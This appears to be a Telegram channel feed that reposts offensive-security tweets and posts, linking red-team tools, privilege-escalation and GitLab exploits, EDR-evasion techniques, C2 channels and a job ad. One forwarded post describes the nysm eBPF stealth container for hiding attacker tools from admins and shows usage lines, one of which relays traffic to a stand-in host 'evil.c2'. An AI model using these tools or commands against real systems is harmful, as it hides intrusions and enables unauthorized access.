😈 [ BC Security @bcsecurity ]
Miss Watson and Sherlock? Meet Moriarty, a C# tool that extends the functionality of @_RastaMouse's Watson and Sherlock.
Also adds scans for CVE-2021-44228, CVE-2022-40140, CVE-2022-22965, and many more!
🔗 https://github.com/BC-SECURITY/Moriarty
🐥 [ tweet ]
Miss Watson and Sherlock? Meet Moriarty, a C# tool that extends the functionality of @_RastaMouse's Watson and Sherlock.
Also adds scans for CVE-2021-44228, CVE-2022-40140, CVE-2022-22965, and many more!
🔗 https://github.com/BC-SECURITY/Moriarty
🐥 [ tweet ]
👍1
😈 [ Kyle Avery @kyleavery_ ]
I decided to try something besides Windows this weekend. Here is a Linux sleep obfuscation poc using POSIX timers:
🔗 https://github.com/kyleavery/pendulum
🐥 [ tweet ]
I decided to try something besides Windows this weekend. Here is a Linux sleep obfuscation poc using POSIX timers:
🔗 https://github.com/kyleavery/pendulum
🐥 [ tweet ]
👍2🤯2
Forwarded from Похек (Sergey Zybnev)
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации.
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Установка:
Использование:
👉 https://github.com/eeriedusk/nysm
🌚 @poxek
Скрытый контейнер для постэксплуатации.
#eBPF #offensive
С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое
Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.
Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make
Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
😈 [ NCV @nickvourd ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
🔗 https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
🐥 [ tweet ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
🔗 https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
🐥 [ tweet ]
🔥4
😈 [ Elastic Security Labs @elasticseclabs ]
In this follow up from his article in May, @SBousseaden digs deeper into call stacks! See how Elastic Security 8.11 further increases efficacy against in-memory threats:
🔗 https://go.es.io/47vnlPZ
🐥 [ tweet ]
In this follow up from his article in May, @SBousseaden digs deeper into call stacks! See how Elastic Security 8.11 further increases efficacy against in-memory threats:
🔗 https://go.es.io/47vnlPZ
🐥 [ tweet ]
👍3
Forwarded from PT SWARM
New article by our researcher @snovvcrash: "Python ❤️ SSPI: Teaching #Impacket to Respect Windows SSO".
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
🥷 Read the blog post and you'll fly under the radar of endpoint security mechanisms as well as custom network detection rules more easily.
https://swarm.ptsecurity.com/python-sspi-teaching-impacket-to-respect-windows-sso/
PT SWARM
Python ❤️ SSPI: Teaching Impacket to Respect Windows SSO
One handy feature of our private Impacket (by @fortra) fork is that it can leverage native SSPI interaction for authentication purposes when operating from a legit domain context on a Windows machine. As far as the partial implementation of Ntsecapi represents…
🔥13
😈 [ Mayfly @M4yFly ]
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system?
🔗 https://threadreaderapp.com/thread/1745581076846690811.html
🐥 [ tweet ]
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system?
🔗 https://threadreaderapp.com/thread/1745581076846690811.html
🐥 [ tweet ]
🔥9👍2
😈 [ MDSec @MDSecLabs ]
Exploiting CVE-2024-20656, a Local Privilege Escalation in the VSStandardCollectorService150 Service - new research from @filip_dragovic
🔗 https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
🔗 https://github.com/Wh04m1001/CVE-2024-20656
🐥 [ tweet ]
Exploiting CVE-2024-20656, a Local Privilege Escalation in the VSStandardCollectorService150 Service - new research from @filip_dragovic
🔗 https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
🔗 https://github.com/Wh04m1001/CVE-2024-20656
🐥 [ tweet ]
👍2
😈 [ Vozec @Vozec1 ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
I have implemented the latest CVE-2023-7028 to Account Take-Over on GitLab completely automatically. (CVSS10):
🔗 https://github.com/Vozec/CVE-2023-7028
🐥 [ tweet ]
👍1🔥1
😈 [ Rasta Mouse @_RastaMouse ]
Ok, is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
🔗 https://www.pinvoke.dev
🔗 https://github.com/ZeroPointSecurity/PInvoke
🐥 [ tweet ]
Ok, is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
🔗 https://www.pinvoke.dev
🔗 https://github.com/ZeroPointSecurity/PInvoke
🐥 [ tweet ]
👍4
😈 [ Daniel Feichter @VirtualAllocEx ]
I was interested to learn more about Vectored Exception Handling and how it can be used in malware development. Hence my first blog post of the year ennoscriptd "Syscalls via Vectored Exception Handling".
🔗 https://redops.at/en/blog/syscalls-via-vectored-exception-handling
🐥 [ tweet ]
I was interested to learn more about Vectored Exception Handling and how it can be used in malware development. Hence my first blog post of the year ennoscriptd "Syscalls via Vectored Exception Handling".
🔗 https://redops.at/en/blog/syscalls-via-vectored-exception-handling
🐥 [ tweet ]
👍3
😈 [ Steve Campbell @lpha3ch0 ]
I felt like httpx was missing the ability to parse Nmap reports for http/s services and it made more sense to create a standalone utility. Nmapurls parses Nmap xml reports and outputs a list of URL's.
🔗 https://github.com/sdcampbell/nmapurls
🐥 [ tweet ]
I felt like httpx was missing the ability to parse Nmap reports for http/s services and it made more sense to create a standalone utility. Nmapurls parses Nmap xml reports and outputs a list of URL's.
🔗 https://github.com/sdcampbell/nmapurls
🐥 [ tweet ]
📢 Команда PT SWARM в поисках своего оффенсив-разработчика!
Заниматься будем поддержкой существующего внутреннего инструментария команды, а также разрабатывать новый для закрытия проектов, важным аспектом которых является уклонения от систем обнаружения и деятельности команд реагирования на киберинциденты, а именно – операций Red Team и контролируемых киберучений.
Работать предстоит под моим кураторством (ЛС @snovvcrash), если вдруг для кого-то это будет преимуществом🤓
🔗 https://hh.ru/vacancy/91158970
Заниматься будем поддержкой существующего внутреннего инструментария команды, а также разрабатывать новый для закрытия проектов, важным аспектом которых является уклонения от систем обнаружения и деятельности команд реагирования на киберинциденты, а именно – операций Red Team и контролируемых киберучений.
Работать предстоит под моим кураторством (ЛС @snovvcrash), если вдруг для кого-то это будет преимуществом
🔗 https://hh.ru/vacancy/91158970
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🤔3😢1
😈 [ vs1m @Vsimpro ]
Got an ethical pentest for a kiosk-esque environment, but you're stuck in a browser? Have access to websites, but have a need to go deeper?
Look no further! With you have access to tools that enable lateral enum, calculator://, file browsing, and more!
🔗 https://kiosk.vsim.xyz/
🐥 [ tweet ]
Got an ethical pentest for a kiosk-esque environment, but you're stuck in a browser? Have access to websites, but have a need to go deeper?
Look no further! With you have access to tools that enable lateral enum, calculator://, file browsing, and more!
🔗 https://kiosk.vsim.xyz/
🐥 [ tweet ]
👍5🤔2
😈 [ yxel @httpyxel ]
LLVM-Yx-CallObfuscator: An LLVM plugin to transparently apply stack spoofing and indirect syscalls to Windows x64 native calls at compile time.
🔗 https://github.com/janoglezcampos/llvm-yx-callobfuscator
🐥 [ tweet ]
LLVM-Yx-CallObfuscator: An LLVM plugin to transparently apply stack spoofing and indirect syscalls to Windows x64 native calls at compile time.
🔗 https://github.com/janoglezcampos/llvm-yx-callobfuscator
🐥 [ tweet ]
🔥3👍1
😈 [ EvilMog @Evil_Mog ]
4 billion if statements:
🔗 https://andreasjhkarlsson.github.io//jekyll/update/2023/12/27/4-billion-if-statements.html
🐥 [ tweet ]
4 billion if statements:
🔗 https://andreasjhkarlsson.github.io//jekyll/update/2023/12/27/4-billion-if-statements.html
🐥 [ tweet ]
смешнявка на этот вечер пятницы😁7👍4🤯1🥱1
😈 [ zhassulan zhussupov @cocomelonckz ]
next one. Since I’m a little busy writing my book for the Packt, I haven’t been writing as often lately. But I’m still working on researching and simulating ransomware.
🔗 https://cocomelonc.github.io/malware/2024/01/16/malware-cryptography-24.html
🐥 [ tweet ]
next one. Since I’m a little busy writing my book for the Packt, I haven’t been writing as often lately. But I’m still working on researching and simulating ransomware.
🔗 https://cocomelonc.github.io/malware/2024/01/16/malware-cryptography-24.html
🐥 [ tweet ]
🔥4😢1
😈 [ Octoberfest7 @Octoberfest73 ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
I'm exited to release GraphStrike, a project I completed during my internship at @RedSiege. Route all of your Cobalt Strike HTTPS traffic through graph.microsoft.com.
Tool:
🔗 https://github.com/RedSiege/GraphStrike?tab=readme-ov-file
Dev blog:
🔗 https://redsiege.com/blog/2024/01/graphstrike-developer
🐥 [ tweet ]
🔥3
😈 [ Kleiton Kurti @kleiton0x7e ]
Created a PoC for loading DLLs without LoadLibraryA. Instead we'll leverage the VEH (Vectored Exception Handler) to modify the context, especially RIP and RCX to hold the LoadLibraryA address and it's argument.
🔗 https://github.com/kleiton0x00/Proxy-DLL-Loads
🐥 [ tweet ]
Created a PoC for loading DLLs without LoadLibraryA. Instead we'll leverage the VEH (Vectored Exception Handler) to modify the context, especially RIP and RCX to hold the LoadLibraryA address and it's argument.
🔗 https://github.com/kleiton0x00/Proxy-DLL-Loads
🐥 [ tweet ]
👍3🔥3
😈 [ ap @decoder_it ]
This is how a specific Group Policy configuration, enabling a security feature bypass, can lead to Privilege Escalation. Full details and examples in my latest blog post ;)
🔗 https://decoder.cloud/2024/01/23/do-not-trust-this-group-policy/
🐥 [ tweet ]
This is how a specific Group Policy configuration, enabling a security feature bypass, can lead to Privilege Escalation. Full details and examples in my latest blog post ;)
🔗 https://decoder.cloud/2024/01/23/do-not-trust-this-group-policy/
🐥 [ tweet ]
🔥1
😈 [ eversinc33 @eversinc33 ]
Small experiment today, inspired by @kaganisildak, using RCON protocol, as used by e.g. CS 1.6 as a C2 channel for the lulz.
🔗 https://github.com/eversinc33/1.6-C2
🐥 [ tweet ]
Small experiment today, inspired by @kaganisildak, using RCON protocol, as used by e.g. CS 1.6 as a C2 channel for the lulz.
🔗 https://github.com/eversinc33/1.6-C2
🐥 [ tweet ]
👍8😁2